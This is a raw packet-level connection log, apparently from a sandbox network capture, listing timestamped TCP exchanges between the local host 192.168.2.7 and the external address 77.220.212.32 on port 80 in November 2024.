Nov 9, 2024 02:47:11.693067074 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693073034 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693084002 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693084955 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693094969 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693095922 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693114042 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693125010 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693125010 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693141937 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693154097 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693154097 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693164110 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693166971 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693192959 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693198919 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693205118 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693216085 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693232059 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693232059 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693243980 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693253994 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693255901 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693290949 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693300962 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693515062 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693533897 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693546057 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693555117 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693567991 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693587065 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693608046 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693625927 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693636894 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693646908 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693648100 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693660975 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693666935 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693671942 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693686008 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693686008 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693696976 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693717003 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693728924 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693747044 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693764925 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693778992 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693797112 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693808079 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693819046 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693829060 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693837881 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693851948 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693883896 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.693954945 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693970919 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693981886 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693993092 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.693994045 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694005013 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694005966 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694015980 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694027901 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694037914 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694039106 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694050074 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694056988 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694061995 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694075108 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694083929 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694094896 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694106102 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694118023 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694118023 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694122076 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694144011 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694152117 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694164038 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694175005 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694175959 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694181919 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694191933 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694204092 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694205046 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694215059 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694221973 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694247007 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694261074 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694617987 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694629908 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694639921 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694660902 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694674015 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694756985 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694773912 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694783926 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694792986 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694794893 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694809914 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694825888 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694840908 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694852114 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694859028 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694859028 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694863081 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694868088 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694875956 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694880009 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694885015 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694895983 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694900990 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694910049 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694928885 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694937944 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694940090 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694952011 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694953918 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.694966078 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694978952 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.694986105 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.695008039 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.695025921 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.810985088 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811126947 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.811167955 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811180115 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811191082 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811208010 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811219931 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811230898 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811243057 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811253071 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811264992 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811271906 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.811271906 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.811276913 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811280966 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.811290979 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811300993 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811302900 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.811306953 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811316967 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811326027 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811338902 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.811340094 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811346054 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811352968 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811358929 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811364889 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811369896 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.811376095 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811382055 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811393023 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811400890 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.811419964 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.811438084 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.811460972 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811472893 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811497927 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.811513901 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.811598063 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811609983 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811629057 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811639071 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811640024 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.811651945 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811661005 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.811661959 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811672926 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811676025 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.811683893 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811693907 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811706066 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.811706066 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811717033 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811726093 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.811728954 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811739922 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811753988 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811769009 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.811789989 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.811789989 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.811855078 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.811855078 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812026978 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812040091 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812051058 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812068939 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812068939 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812087059 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812084913 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812098980 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812109947 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812114954 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812119961 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812130928 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812139034 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812140942 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812153101 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812165022 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812165022 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812176943 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812179089 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812189102 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812192917 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812200069 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812222004 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812246084 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812258959 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812268972 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812278032 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812295914 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812315941 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812324047 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812366009 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812375069 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812386036 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812401056 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812422991 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812422037 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812434912 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812473059 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812494993 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812499046 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812510967 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812526941 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812537909 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812541008 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812552929 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812553883 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812570095 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812601089 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812750101 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812762022 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812772989 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812788010 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812803030 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812856913 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812868118 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812879086 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812890053 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812894106 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812906981 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812917948 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812920094 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812928915 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812937975 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812946081 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812961102 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.812963963 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.812983990 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813000917 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813009977 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813011885 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813021898 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813038111 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813038111 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813050032 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813060999 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813071012 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813071012 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813102961 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813116074 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813121080 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813128948 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813138962 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813153028 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813163996 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813174963 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813175917 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813183069 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813186884 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813205004 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813205957 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813216925 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813225031 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813229084 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813241005 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813250065 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813254118 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813266039 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813272953 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813278913 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813292980 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813301086 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813306093 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813316107 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813317060 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813322067 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813334942 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813343048 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813349009 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813366890 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813371897 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813380003 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813381910 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813386917 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813419104 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813421011 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813431025 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813440084 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813450098 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813457012 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813460112 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813486099 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813508034 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813731909 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813747883 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813759089 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813769102 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813770056 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813781023 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813787937 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813791990 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813803911 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813811064 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813812971 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813822985 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813832045 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813834906 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813853025 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813853979 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813863993 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813874006 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813884974 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813893080 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813901901 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813909054 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813913107 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813925982 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813927889 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813935995 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813940048 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813947916 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813956976 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.813972950 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.813999891 CET	49699	80	192.168.2.7	77.220.212.32
Nov 9, 2024 02:47:11.814166069 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814177990 CET	80	49699	77.220.212.32	192.168.2.7
Nov 9, 2024 02:47:11.814193964 CET	80	49699	77.220.212.32	192.168.2.7
